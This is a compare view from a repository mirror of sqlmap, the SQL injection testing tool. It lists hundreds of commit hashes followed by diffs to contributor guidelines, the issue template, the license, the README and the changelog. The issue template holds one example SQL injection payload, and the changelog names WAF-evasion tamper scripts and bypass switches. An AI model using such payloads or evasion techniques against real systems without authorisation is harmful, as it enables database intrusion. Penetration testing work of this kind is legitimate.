mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2025-12-11 02:09:04 +00:00
Compare commits
557 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
bd74a201d5 | ||
|
|
82aa481e06 | ||
|
|
1f375e418a | ||
|
|
ed26dc0235 | ||
|
|
e8f505b701 | ||
|
|
dddff45adb | ||
|
|
b3777995b2 | ||
|
|
a52328bfba | ||
|
|
a303d6712e | ||
|
|
e01a7908aa | ||
|
|
4b5457903a | ||
|
|
78da395506 | ||
|
|
44a8242d2f | ||
|
|
66e2fc302c | ||
|
|
bdc4457f34 | ||
|
|
ba356baab0 | ||
|
|
ae6235ce20 | ||
|
|
ef8530af5b | ||
|
|
3d88dc0a51 | ||
|
|
a31ac0376d | ||
|
|
8f13bda035 | ||
|
|
1adc66b763 | ||
|
|
2c270ed250 | ||
|
|
7074365f8e | ||
|
|
fd705c3dff | ||
|
|
db3bed3f44 | ||
|
|
7672b9a0a2 | ||
|
|
17b79cd21b | ||
|
|
36b69bbe79 | ||
|
|
daa915a6f2 | ||
|
|
01dba5c505 | ||
|
|
b5db4dc15a | ||
|
|
915d2bdec0 | ||
|
|
7eb45b9d8f | ||
|
|
669afdd81b | ||
|
|
21ce71bee8 | ||
|
|
40f067aa17 | ||
|
|
6cdb90ddf8 | ||
|
|
c0d4db3aba | ||
|
|
d086b2aca0 | ||
|
|
7cf4b0e1d2 | ||
|
|
660036c38b | ||
|
|
0a3144ebb5 | ||
|
|
02d66db7e0 | ||
|
|
c94bddd924 | ||
|
|
aea3749015 | ||
|
|
204c1950fc | ||
|
|
17be4d6374 | ||
|
|
d7ba7150ce | ||
|
|
d31d2eeb27 | ||
|
|
c74c58c47e | ||
|
|
d16252e959 | ||
|
|
9fef4336b0 | ||
|
|
aa7af33fd5 | ||
|
|
241c6b02f0 | ||
|
|
915ee5ce53 | ||
|
|
beee81697c | ||
|
|
880545cad4 | ||
|
|
5274c88c7d | ||
|
|
9a221470e7 | ||
|
|
256ec75580 | ||
|
|
debb64167a | ||
|
|
49514adcd9 | ||
|
|
02b78d2691 | ||
|
|
82e3c48c8c | ||
|
|
243b564b6a | ||
|
|
cb72223452 | ||
|
|
bf207a7ea6 | ||
|
|
3b4e44a38d | ||
|
|
97cf5b9ace | ||
|
|
ba617c49a4 | ||
|
|
929df9bc34 | ||
|
|
48cdc6a308 | ||
|
|
3b7ef42b30 | ||
|
|
bdddc5c333 | ||
|
|
8ceff3dcc7 | ||
|
|
fcfbc5d59f | ||
|
|
12883cac16 | ||
|
|
9f75fd4fb8 | ||
|
|
54d0678cbe | ||
|
|
30497acd0c | ||
|
|
ed0420e635 | ||
|
|
094ce29709 | ||
|
|
ddd8712c4f | ||
|
|
37449262df | ||
|
|
45c699e9cf | ||
|
|
e22fab1945 | ||
|
|
e3134cc965 | ||
|
|
5957aad738 | ||
|
|
4c4de54ad8 | ||
|
|
590e8ed5ae | ||
|
|
12427ff6f8 | ||
|
|
45d0010323 | ||
|
|
e18b41fc82 | ||
|
|
586c461ae6 | ||
|
|
c799e794f2 | ||
|
|
b31c264a59 | ||
|
|
a569f21ad7 | ||
|
|
8092551fa9 | ||
|
|
83972d405f | ||
|
|
de0df99d8e | ||
|
|
ddee027afb | ||
|
|
6ce0350abc | ||
|
|
37de01e993 | ||
|
|
63cca82288 | ||
|
|
7d1c2633c9 | ||
|
|
9564c8e8b1 | ||
|
|
5e099144d3 | ||
|
|
a007cd30e5 | ||
|
|
4c9e0b9f1e | ||
|
|
0c3fbc46df | ||
|
|
107d9f90ad | ||
|
|
daafe9b74a | ||
|
|
9727f0d691 | ||
|
|
61e0459ec8 | ||
|
|
c5802a5367 | ||
|
|
01d5da18e3 | ||
|
|
b288bfdbc3 | ||
|
|
1e508547d8 | ||
|
|
4fe4c582c1 | ||
|
|
28e7c8f378 | ||
|
|
c497aa98ed | ||
|
|
4ba9e9397c | ||
|
|
eedfa8c888 | ||
|
|
c224ea0e37 | ||
|
|
f544554475 | ||
|
|
c7c7e30130 | ||
|
|
d1426a023f | ||
|
|
83a1b9b2e7 | ||
|
|
38684ec220 | ||
|
|
2e5edce8b9 | ||
|
|
a02662f03f | ||
|
|
2c95b65eac | ||
|
|
e47c1aa61b | ||
|
|
f81062d595 | ||
|
|
ef911b6be4 | ||
|
|
4f1b0787ed | ||
|
|
070e173067 | ||
|
|
f04584bb68 | ||
|
|
66d26f67bf | ||
|
|
101d1f0d49 | ||
|
|
843126702d | ||
|
|
65f227fe65 | ||
|
|
536d9a597e | ||
|
|
0ce2128a9b | ||
|
|
e7ed2bbcbb | ||
|
|
560ff4154b | ||
|
|
1d0d5f1675 | ||
|
|
f1a3c81aec | ||
|
|
277a4fa402 | ||
|
|
037db0f4a0 | ||
|
|
3f1bf742fc | ||
|
|
abb911d741 | ||
|
|
dc5edf1a86 | ||
|
|
e11febdcbc | ||
|
|
f2af8861f9 | ||
|
|
2895e5c20f | ||
|
|
b1e8c75672 | ||
|
|
6cc52cc12a | ||
|
|
ddf353b86e | ||
|
|
e6535d359d | ||
|
|
90e381a5a5 | ||
|
|
e99e9919cd | ||
|
|
dbdfbcc425 | ||
|
|
1d6832a84a | ||
|
|
73d83280fe | ||
|
|
1bd8c519c3 | ||
|
|
a4fdbf1343 | ||
|
|
130879fbf3 | ||
|
|
db5ae9ae0b | ||
|
|
cc4833429f | ||
|
|
703b7079a4 | ||
|
|
ef52ee977f | ||
|
|
ba1b4c50be | ||
|
|
1e7dfe11b4 | ||
|
|
92febd22a8 | ||
|
|
83081b5e14 | ||
|
|
f2035145fe | ||
|
|
48b407c0fa | ||
|
|
4466504f30 | ||
|
|
dc65afe65a | ||
|
|
132e963b53 | ||
|
|
f52beff7c3 | ||
|
|
feb93dce44 | ||
|
|
e52422900e | ||
|
|
c045afd842 | ||
|
|
0d2db32539 | ||
|
|
77f4fd93e7 | ||
|
|
68f5597b4a | ||
|
|
411f56e710 | ||
|
|
fb95ab8c17 | ||
|
|
9f6e04b141 | ||
|
|
1f2bdf5a3d | ||
|
|
465a1e1a86 | ||
|
|
6af127cb64 | ||
|
|
880d438418 | ||
|
|
5efe3228f8 | ||
|
|
e005ba3f77 | ||
|
|
f2b4dc3ffc | ||
|
|
d1022f3f59 | ||
|
|
3984b94297 | ||
|
|
eba01ee74e | ||
|
|
36b660309b | ||
|
|
fd89fdf40b | ||
|
|
2e53096962 | ||
|
|
79e45bd8d7 | ||
|
|
ed5f4abebd | ||
|
|
03bbfdbc56 | ||
|
|
1b6365b195 | ||
|
|
d38a0542d8 | ||
|
|
9182b90b2b | ||
|
|
80af22435a | ||
|
|
065c5e8157 | ||
|
|
932aa8dd94 | ||
|
|
71208e891c | ||
|
|
3b369920a1 | ||
|
|
68a83098ab | ||
|
|
f4a0820dcb | ||
|
|
459e1dd9a4 | ||
|
|
4b698748f7 | ||
|
|
e697354765 | ||
|
|
721046831b | ||
|
|
a4068f9abf | ||
|
|
245c5e64e9 | ||
|
|
cd08d13647 | ||
|
|
8abae02111 | ||
|
|
dd9bfd13f2 | ||
|
|
0c7eecee9f | ||
|
|
3e72da66f9 | ||
|
|
ca9a56c0ff | ||
|
|
2d2b20344d | ||
|
|
a8a7dee800 | ||
|
|
35d9ed8476 | ||
|
|
a5e3dce26f | ||
|
|
71448b1c16 | ||
|
|
a633bc7f32 | ||
|
|
6697e49f75 | ||
|
|
db8bcd1d2e | ||
|
|
16c052ef13 | ||
|
|
a8c0722631 | ||
|
|
c9a73aeed1 | ||
|
|
470b68a83c | ||
|
|
f01ae291f8 | ||
|
|
c36749c3bb | ||
|
|
63b84c31e5 | ||
|
|
ec253dd5bd | ||
|
|
4c25a20efc | ||
|
|
2b56bdfaa6 | ||
|
|
c37014b8e8 | ||
|
|
349e9b9fa5 | ||
|
|
ac481492c0 | ||
|
|
91c5151770 | ||
|
|
ad5a731999 | ||
|
|
95be19a692 | ||
|
|
dbcf030743 | ||
|
|
fa3f3baf1e | ||
|
|
f125f64a80 | ||
|
|
12012b36b1 | ||
|
|
43c9e21c56 | ||
|
|
a831865633 | ||
|
|
578c41f6de | ||
|
|
dc01f2e773 | ||
|
|
db327a8538 | ||
|
|
aefb815064 | ||
|
|
014978cebc | ||
|
|
287371337d | ||
|
|
62a3618353 | ||
|
|
366a3f9336 | ||
|
|
74d2b60cf3 | ||
|
|
9e892e93f3 | ||
|
|
0bbf5f9467 | ||
|
|
8be4b29fd1 | ||
|
|
0507234add | ||
|
|
c3d9a1c2d4 | ||
|
|
9e8b28be7c | ||
|
|
f3f4a4cb37 | ||
|
|
2280f3ff2d | ||
|
|
d6cf038e48 | ||
|
|
2dfc383700 | ||
|
|
f20e7b403a | ||
|
|
36e62fe8a7 | ||
|
|
2542b6d241 | ||
|
|
bc13d8923b | ||
|
|
e51db6b355 | ||
|
|
6d28ca1f93 | ||
|
|
03e4741a69 | ||
|
|
b899ab9eb3 | ||
|
|
2e017eee99 | ||
|
|
a296d22195 | ||
|
|
ad11749b15 | ||
|
|
75a64245c5 | ||
|
|
9e00202823 | ||
|
|
df977d93d4 | ||
|
|
b0ca52086a | ||
|
|
af89137f2c | ||
|
|
1f9bf587b5 | ||
|
|
f0e4c20004 | ||
|
|
cef416559a | ||
|
|
ce47b6c76e | ||
|
|
39108bc100 | ||
|
|
f63ceaa0c1 | ||
|
|
1e60378fb2 | ||
|
|
22c7bc54b4 | ||
|
|
5f1bae86b0 | ||
|
|
a0cbf6991d | ||
|
|
9f2bc00426 | ||
|
|
6bb486c1bf | ||
|
|
741ce9e3f0 | ||
|
|
a479655097 | ||
|
|
4846d85ccd | ||
|
|
3c439c3929 | ||
|
|
5cc36a5736 | ||
|
|
29dcdd3bef | ||
|
|
53eadb0af8 | ||
|
|
7b705b94e3 | ||
|
|
558484644a | ||
|
|
e84142b6a9 | ||
|
|
b44551230e | ||
|
|
4ecf6eee05 | ||
|
|
57be1856a6 | ||
|
|
a424e4ab59 | ||
|
|
4660b816d5 | ||
|
|
f92e1ebc40 | ||
|
|
48cd0421a6 | ||
|
|
4b4f728d8e | ||
|
|
e8336ecfe1 | ||
|
|
38ea0686a8 | ||
|
|
73b0de67b5 | ||
|
|
fae97b3937 | ||
|
|
c0947846f4 | ||
|
|
5e2d0bd320 | ||
|
|
4badb54607 | ||
|
|
29aaec8925 | ||
|
|
27ff5d6fec | ||
|
|
72ff6e24ff | ||
|
|
717c451b8c | ||
|
|
e5968cae31 | ||
|
|
2b55ae3e2a | ||
|
|
8f4488d608 | ||
|
|
f1254fef4b | ||
|
|
ccda26a567 | ||
|
|
099110bc1f | ||
|
|
0265b3fcfa | ||
|
|
961d2b24d1 | ||
|
|
53578bcb7c | ||
|
|
756f02fb0e | ||
|
|
17c170e1f8 | ||
|
|
220c1be162 | ||
|
|
6b06332896 | ||
|
|
c268663bd9 | ||
|
|
a97fd1dede | ||
|
|
b93284530e | ||
|
|
cf4c263a4e | ||
|
|
23777143b6 | ||
|
|
9b397f00be | ||
|
|
d47c16e196 | ||
|
|
e0c7b5c63c | ||
|
|
091c8ab2dd | ||
|
|
86303bde55 | ||
|
|
c89f119e1a | ||
|
|
25369ca591 | ||
|
|
a399b65033 | ||
|
|
ed37ae1562 | ||
|
|
5381d4d5be | ||
|
|
c1825b2651 | ||
|
|
e7d448c56c | ||
|
|
694b5bb5c0 | ||
|
|
eb498e6c03 | ||
|
|
ca8b589d43 | ||
|
|
18706f7fad | ||
|
|
80f3b9a711 | ||
|
|
6b3f01bfeb | ||
|
|
42042fb5de | ||
|
|
2abc7fc588 | ||
|
|
1ecc326714 | ||
|
|
d2d829abf5 | ||
|
|
43d9ac2bd4 | ||
|
|
d8196cf7e6 | ||
|
|
42b0edca6d | ||
|
|
331ccc5549 | ||
|
|
d5627fdf1b | ||
|
|
7b3a17bfe7 | ||
|
|
4a8f01c9dc | ||
|
|
13bf3e649a | ||
|
|
9a63fb1055 | ||
|
|
3544793961 | ||
|
|
7a8add0412 | ||
|
|
1d382bcb4d | ||
|
|
ec6ad3ce68 | ||
|
|
73d8952f2a | ||
|
|
2a810fb796 | ||
|
|
8f7a7bed20 | ||
|
|
36b0ece2ad | ||
|
|
7d8fbab035 | ||
|
|
5580db0045 | ||
|
|
3fde205cd4 | ||
|
|
1822cc05f6 | ||
|
|
509bb41b06 | ||
|
|
8ca3287df4 | ||
|
|
60767de2eb | ||
|
|
29e683fb5b | ||
|
|
148d1c9ff9 | ||
|
|
a8cb14ed4a | ||
|
|
c634f0b0d6 | ||
|
|
8605c49911 | ||
|
|
44f6951dfe | ||
|
|
b5b32c951c | ||
|
|
a9c3b59cff | ||
|
|
4528cb014d | ||
|
|
2c5f976993 | ||
|
|
4f2669a45a | ||
|
|
641838ed73 | ||
|
|
2a681b7bd6 | ||
|
|
7f3f1dcdee | ||
|
|
4147f44e63 | ||
|
|
2cc6214227 | ||
|
|
8a90512354 | ||
|
|
ae8699f258 | ||
|
|
cdb1e79370 | ||
|
|
f0677d88b7 | ||
|
|
16cd13d7db | ||
|
|
c7329cb03b | ||
|
|
45fb5ab4a5 | ||
|
|
241f7321de | ||
|
|
c6c1ac02bb | ||
|
|
f287ff3767 | ||
|
|
7d5a0ed2dc | ||
|
|
4fc7fc6447 | ||
|
|
880d709bfd | ||
|
|
0ddc7bae66 | ||
|
|
305b2aa9b5 | ||
|
|
e63b97afd6 | ||
|
|
c378b6691c | ||
|
|
ee431cd83b | ||
|
|
e088fe08ec | ||
|
|
74de40b9c5 | ||
|
|
6c2b7cff80 | ||
|
|
a6809e03ef | ||
|
|
ac68eed65d | ||
|
|
a27f21cb1d | ||
|
|
01fb07f68c | ||
|
|
d7f2445814 | ||
|
|
6875c40a06 | ||
|
|
4cd859012a | ||
|
|
5feb4c3ccd | ||
|
|
3c5e9e7559 | ||
|
|
909a3456e3 | ||
|
|
fa4c1c5251 | ||
|
|
8166a4eeb8 | ||
|
|
ae2b02952f | ||
|
|
1d9c11b1c1 | ||
|
|
99894dc3c1 | ||
|
|
0c4b6c9978 | ||
|
|
cd88caa0e7 | ||
|
|
c024233f88 | ||
|
|
5380e8174b | ||
|
|
4cefff7e98 | ||
|
|
11b52c85e1 | ||
|
|
24cefeaee2 | ||
|
|
9ad32864ec | ||
|
|
190e8ae5fa | ||
|
|
43044d8512 | ||
|
|
881b49afd2 | ||
|
|
93b425809e | ||
|
|
4f2f31af67 | ||
|
|
f95d0c831b | ||
|
|
76905e8728 | ||
|
|
8d6cc4ae2c | ||
|
|
a369f61207 | ||
|
|
34d2fb1c8f | ||
|
|
ec6de40a8d | ||
|
|
6402d2ec57 | ||
|
|
b25f2bfa45 | ||
|
|
9df16f3eb2 | ||
|
|
d99151ce5a | ||
|
|
93859fdc42 | ||
|
|
b595b883d1 | ||
|
|
67f8c22702 | ||
|
|
24cc6e92e9 | ||
|
|
f38596a5b3 | ||
|
|
5ff54bf9c6 | ||
|
|
8e8ae52288 | ||
|
|
e2cc9569e5 | ||
|
|
365fa5a52a | ||
|
|
faaae2b647 | ||
|
|
d813d24c48 | ||
|
|
e347d90ec5 | ||
|
|
56a4e507e8 | ||
|
|
5b99180ffe | ||
|
|
061c8da36b | ||
|
|
a16663f9a1 | ||
|
|
62fc2e1e17 | ||
|
|
ef8b2d793f | ||
|
|
aebfb7d597 | ||
|
|
9e75bb7f68 | ||
|
|
be7711bcdb | ||
|
|
10fd004dec | ||
|
|
0a8bc52910 | ||
|
|
31fa7f6c94 | ||
|
|
30f8c30d6a | ||
|
|
fd8bbaff9f | ||
|
|
02661c166d | ||
|
|
4bf20066ec | ||
|
|
c5730ee88d | ||
|
|
a7bf4f47e6 | ||
|
|
fc06d4d9cb | ||
|
|
4b9613e362 | ||
|
|
cea9d1c75e | ||
|
|
94c170d392 | ||
|
|
18626656ec | ||
|
|
e5ab678db0 | ||
|
|
a59198d1e4 | ||
|
|
f6738adc04 | ||
|
|
e0dee9418d | ||
|
|
439f8247b6 | ||
|
|
165b275fd7 | ||
|
|
811bd0e89f | ||
|
|
47bbcf90ea | ||
|
|
8a122401aa | ||
|
|
ddc453e3da | ||
|
|
764d114b3c | ||
|
|
6e9fe27fa0 | ||
|
|
132fb0d18d | ||
|
|
84b7a26bfd | ||
|
|
66c1f72a16 | ||
|
|
b6584c8043 | ||
|
|
78ac42c168 | ||
|
|
009f13742e | ||
|
|
1df0461893 | ||
|
|
bc1fbc5a58 | ||
|
|
cad6cfe6a6 | ||
|
|
7ade3aa1ad | ||
|
|
0b24a80387 | ||
|
|
574074e171 | ||
|
|
f2f7994ac6 | ||
|
|
42ddfd8f50 | ||
|
|
2d4391dc36 | ||
|
|
5326df1071 | ||
|
|
9a2cdd4b59 | ||
|
|
acd764fee8 | ||
|
|
310a82933c | ||
|
|
b1662f54c8 | ||
|
|
8cef17b583 | ||
|
|
cb1b5d30fd | ||
|
|
5d6b972002 | ||
|
|
57044262d9 | ||
|
|
8d19c3bd46 | ||
|
|
b9efdb2999 | ||
|
|
dde1178100 | ||
|
|
638dbf255a | ||
|
|
a90b5f7fb3 | ||
|
|
06ca058300 | ||
|
|
370884d07a | ||
|
|
91bffe988b | ||
|
|
220dffbcfa | ||
|
|
9fab2c9764 | ||
|
|
7244e8e4e2 |
1
.github/CONTRIBUTING.md
vendored
1
.github/CONTRIBUTING.md
vendored
@@ -24,7 +24,6 @@ Many [people](https://raw.github.com/sqlmapproject/sqlmap/master/doc/THANKS.md)
|
|||||||
In order to maintain consistency and readability throughout the code, we ask that you adhere to the following instructions:
|
In order to maintain consistency and readability throughout the code, we ask that you adhere to the following instructions:
|
||||||
|
|
||||||
* Each patch should make one logical change.
|
* Each patch should make one logical change.
|
||||||
* Wrap code to 76 columns when possible.
|
|
||||||
* Avoid tabbing, use four blank spaces instead.
|
* Avoid tabbing, use four blank spaces instead.
|
||||||
* Before you put time into a non-trivial patch, it is worth discussing it privately by [email](mailto:dev@sqlmap.org).
|
* Before you put time into a non-trivial patch, it is worth discussing it privately by [email](mailto:dev@sqlmap.org).
|
||||||
* Do not change style on numerous files in one single pull request, we can [discuss](mailto:dev@sqlmap.org) about those before doing any major restyling, but be sure that personal preferences not having a strong support in [PEP 8](http://www.python.org/dev/peps/pep-0008/) will likely to be rejected.
|
* Do not change style on numerous files in one single pull request, we can [discuss](mailto:dev@sqlmap.org) about those before doing any major restyling, but be sure that personal preferences not having a strong support in [PEP 8](http://www.python.org/dev/peps/pep-0008/) will likely to be rejected.
|
||||||
|
|||||||
2
.github/ISSUE_TEMPLATE.md
vendored
2
.github/ISSUE_TEMPLATE.md
vendored
@@ -19,7 +19,7 @@
|
|||||||
* Client OS (e.g. `Microsoft Windows 10`)
|
* Client OS (e.g. `Microsoft Windows 10`)
|
||||||
* Program version (`python sqlmap.py --version` or `sqlmap --version` depending on installation):
|
* Program version (`python sqlmap.py --version` or `sqlmap --version` depending on installation):
|
||||||
* Target DBMS (e.g. `Microsoft SQL Server`):
|
* Target DBMS (e.g. `Microsoft SQL Server`):
|
||||||
* Detected WAF/IDS/IPS protection (e.g. `ModSecurity` or `unknown`):
|
* Detected WAF/IPS protection (e.g. `ModSecurity` or `unknown`):
|
||||||
* SQLi techniques found by sqlmap (e.g. `error-based` and `boolean-based blind`):
|
* SQLi techniques found by sqlmap (e.g. `error-based` and `boolean-based blind`):
|
||||||
* Results of manual target assessment (e.g. found that the payload `query=test' AND 4113 IN ((SELECT 'foobar'))-- qKLV` works):
|
* Results of manual target assessment (e.g. found that the payload `query=test' AND 4113 IN ((SELECT 'foobar'))-- qKLV` works):
|
||||||
* Relevant console output (if any):
|
* Relevant console output (if any):
|
||||||
|
|||||||
@@ -1,4 +1,7 @@
|
|||||||
language: python
|
language: python
|
||||||
|
sudo: false
|
||||||
|
git:
|
||||||
|
depth: 1
|
||||||
python:
|
python:
|
||||||
- "2.6"
|
- "2.6"
|
||||||
- "2.7"
|
- "2.7"
|
||||||
|
|||||||
46
COMMITMENT
Normal file
46
COMMITMENT
Normal file
@@ -0,0 +1,46 @@
|
|||||||
|
GPL Cooperation Commitment
|
||||||
|
Version 1.0
|
||||||
|
|
||||||
|
Before filing or continuing to prosecute any legal proceeding or claim
|
||||||
|
(other than a Defensive Action) arising from termination of a Covered
|
||||||
|
License, we commit to extend to the person or entity ('you') accused
|
||||||
|
of violating the Covered License the following provisions regarding
|
||||||
|
cure and reinstatement, taken from GPL version 3. As used here, the
|
||||||
|
term 'this License' refers to the specific Covered License being
|
||||||
|
enforced.
|
||||||
|
|
||||||
|
However, if you cease all violation of this License, then your
|
||||||
|
license from a particular copyright holder is reinstated (a)
|
||||||
|
provisionally, unless and until the copyright holder explicitly
|
||||||
|
and finally terminates your license, and (b) permanently, if the
|
||||||
|
copyright holder fails to notify you of the violation by some
|
||||||
|
reasonable means prior to 60 days after the cessation.
|
||||||
|
|
||||||
|
Moreover, your license from a particular copyright holder is
|
||||||
|
reinstated permanently if the copyright holder notifies you of the
|
||||||
|
violation by some reasonable means, this is the first time you
|
||||||
|
have received notice of violation of this License (for any work)
|
||||||
|
from that copyright holder, and you cure the violation prior to 30
|
||||||
|
days after your receipt of the notice.
|
||||||
|
|
||||||
|
We intend this Commitment to be irrevocable, and binding and
|
||||||
|
enforceable against us and assignees of or successors to our
|
||||||
|
copyrights.
|
||||||
|
|
||||||
|
Definitions
|
||||||
|
|
||||||
|
'Covered License' means the GNU General Public License, version 2
|
||||||
|
(GPLv2), the GNU Lesser General Public License, version 2.1
|
||||||
|
(LGPLv2.1), or the GNU Library General Public License, version 2
|
||||||
|
(LGPLv2), all as published by the Free Software Foundation.
|
||||||
|
|
||||||
|
'Defensive Action' means a legal proceeding or claim that We bring
|
||||||
|
against you in response to a prior proceeding or claim initiated by
|
||||||
|
you or your affiliate.
|
||||||
|
|
||||||
|
'We' means each contributor to this repository as of the date of
|
||||||
|
inclusion of this file, including subsidiaries of a corporate
|
||||||
|
contributor.
|
||||||
|
|
||||||
|
This work is available under a Creative Commons Attribution-ShareAlike
|
||||||
|
4.0 International license (https://creativecommons.org/licenses/by-sa/4.0/).
|
||||||
2
LICENSE
2
LICENSE
@@ -1,7 +1,7 @@
|
|||||||
COPYING -- Describes the terms under which sqlmap is distributed. A copy
|
COPYING -- Describes the terms under which sqlmap is distributed. A copy
|
||||||
of the GNU General Public License (GPL) is appended to this file.
|
of the GNU General Public License (GPL) is appended to this file.
|
||||||
|
|
||||||
sqlmap is (C) 2006-2017 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar.
|
sqlmap is (C) 2006-2019 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar.
|
||||||
|
|
||||||
This program is free software; you may redistribute and/or modify it under
|
This program is free software; you may redistribute and/or modify it under
|
||||||
the terms of the GNU General Public License as published by the Free
|
the terms of the GNU General Public License as published by the Free
|
||||||
|
|||||||
@@ -1,10 +1,10 @@
|
|||||||
# sqlmap
|
# sqlmap
|
||||||
|
|
||||||
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://badge.fury.io/py/sqlmap) [](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [](https://twitter.com/sqlmap)
|
||||||
|
|
||||||
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
|
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
|
||||||
|
|
||||||
**The sqlmap project is sponsored by [Netsparker Web Application Security Scanner](https://www.netsparker.com/?utm_source=github.com&utm_medium=referral&utm_content=sqlmap+repo&utm_campaign=generic+advert).**
|
**The sqlmap project is sponsored by [Netsparker Web Application Security Scanner](https://www.netsparker.com/scan-website-security-issues/?utm_source=sqlmap.org&utm_medium=banner&utm_campaign=github).**
|
||||||
|
|
||||||
Screenshots
|
Screenshots
|
||||||
----
|
----
|
||||||
@@ -64,5 +64,7 @@ Translations
|
|||||||
* [Japanese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ja-JP.md)
|
* [Japanese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ja-JP.md)
|
||||||
* [Polish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pl-PL.md)
|
* [Polish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pl-PL.md)
|
||||||
* [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md)
|
* [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md)
|
||||||
|
* [Russian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ru-RUS.md)
|
||||||
* [Spanish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md)
|
* [Spanish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md)
|
||||||
* [Turkish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-tr-TR.md)
|
* [Turkish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-tr-TR.md)
|
||||||
|
* [Ukrainian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-uk-UA.md)
|
||||||
|
|||||||
@@ -3,7 +3,7 @@
|
|||||||
* Implemented support for automatic decoding of page content through detected charset.
|
* Implemented support for automatic decoding of page content through detected charset.
|
||||||
* Implemented mechanism for proper data dumping on DBMSes not supporting `LIMIT/OFFSET` like mechanism(s) (e.g. Microsoft SQL Server, Sybase, etc.).
|
* Implemented mechanism for proper data dumping on DBMSes not supporting `LIMIT/OFFSET` like mechanism(s) (e.g. Microsoft SQL Server, Sybase, etc.).
|
||||||
* Major improvements to program stabilization based on user reports.
|
* Major improvements to program stabilization based on user reports.
|
||||||
* Added new tampering scripts avoiding popular WAF/IPS/IDS mechanisms.
|
* Added new tampering scripts avoiding popular WAF/IPS mechanisms.
|
||||||
* Fixed major bug with DNS leaking in Tor mode.
|
* Fixed major bug with DNS leaking in Tor mode.
|
||||||
* Added wordlist compilation made of the most popular cracking dictionaries.
|
* Added wordlist compilation made of the most popular cracking dictionaries.
|
||||||
* Implemented multi-processor hash cracking routine(s).
|
* Implemented multi-processor hash cracking routine(s).
|
||||||
@@ -23,7 +23,7 @@
|
|||||||
* Added option `--csv-del` for manually setting delimiting character used in CSV output.
|
* Added option `--csv-del` for manually setting delimiting character used in CSV output.
|
||||||
* Added switch `--hex` for using DBMS hex conversion function(s) for data retrieval.
|
* Added switch `--hex` for using DBMS hex conversion function(s) for data retrieval.
|
||||||
* Added switch `--smart` for conducting through tests only in case of positive heuristic(s).
|
* Added switch `--smart` for conducting through tests only in case of positive heuristic(s).
|
||||||
* Added switch `--check-waf` for checking of existence of WAF/IPS/IDS protection.
|
* Added switch `--check-waf` for checking of existence of WAF/IPS protection.
|
||||||
* Added switch `--schema` to enumerate DBMS schema: shows all columns of all databases' tables.
|
* Added switch `--schema` to enumerate DBMS schema: shows all columns of all databases' tables.
|
||||||
* Added switch `--count` to count the number of entries for a specific table or all database(s) tables.
|
* Added switch `--count` to count the number of entries for a specific table or all database(s) tables.
|
||||||
* Major improvements to switches `--tables` and `--columns`.
|
* Major improvements to switches `--tables` and `--columns`.
|
||||||
@@ -55,7 +55,7 @@
|
|||||||
* Added option `--host` to set the HTTP Host header value.
|
* Added option `--host` to set the HTTP Host header value.
|
||||||
* Added switch `--hostname` to turn on retrieval of DBMS server hostname.
|
* Added switch `--hostname` to turn on retrieval of DBMS server hostname.
|
||||||
* Added switch `--hpp` to turn on the usage of HTTP parameter pollution WAF bypass method.
|
* Added switch `--hpp` to turn on the usage of HTTP parameter pollution WAF bypass method.
|
||||||
* Added switch `--identify-waf` for turning on the thorough testing of WAF/IPS/IDS protection.
|
* Added switch `--identify-waf` for turning on the thorough testing of WAF/IPS protection.
|
||||||
* Added switch `--ignore-401` to ignore HTTP Error Code 401 (Unauthorized).
|
* Added switch `--ignore-401` to ignore HTTP Error Code 401 (Unauthorized).
|
||||||
* Added switch `--invalid-bignum` for usage of big numbers while invalidating values.
|
* Added switch `--invalid-bignum` for usage of big numbers while invalidating values.
|
||||||
* Added switch `--invalid-logical` for usage of logical operations while invalidating values.
|
* Added switch `--invalid-logical` for usage of logical operations while invalidating values.
|
||||||
@@ -78,7 +78,7 @@
|
|||||||
* Added option `--skip` to skip testing of given parameter(s).
|
* Added option `--skip` to skip testing of given parameter(s).
|
||||||
* Added switch `--skip-static` to skip testing parameters that not appear to be dynamic.
|
* Added switch `--skip-static` to skip testing parameters that not appear to be dynamic.
|
||||||
* Added switch `--skip-urlencode` to skip URL encoding of payload data.
|
* Added switch `--skip-urlencode` to skip URL encoding of payload data.
|
||||||
* Added switch `--skip-waf` to skip heuristic detection of WAF/IPS/IDS protection.
|
* Added switch `--skip-waf` to skip heuristic detection of WAF/IPS protection.
|
||||||
* Added switch `--smart` to conduct thorough tests only if positive heuristic(s).
|
* Added switch `--smart` to conduct thorough tests only if positive heuristic(s).
|
||||||
* Added option `--sql-file` for setting file(s) holding SQL statements to be executed (in case of stacked SQLi).
|
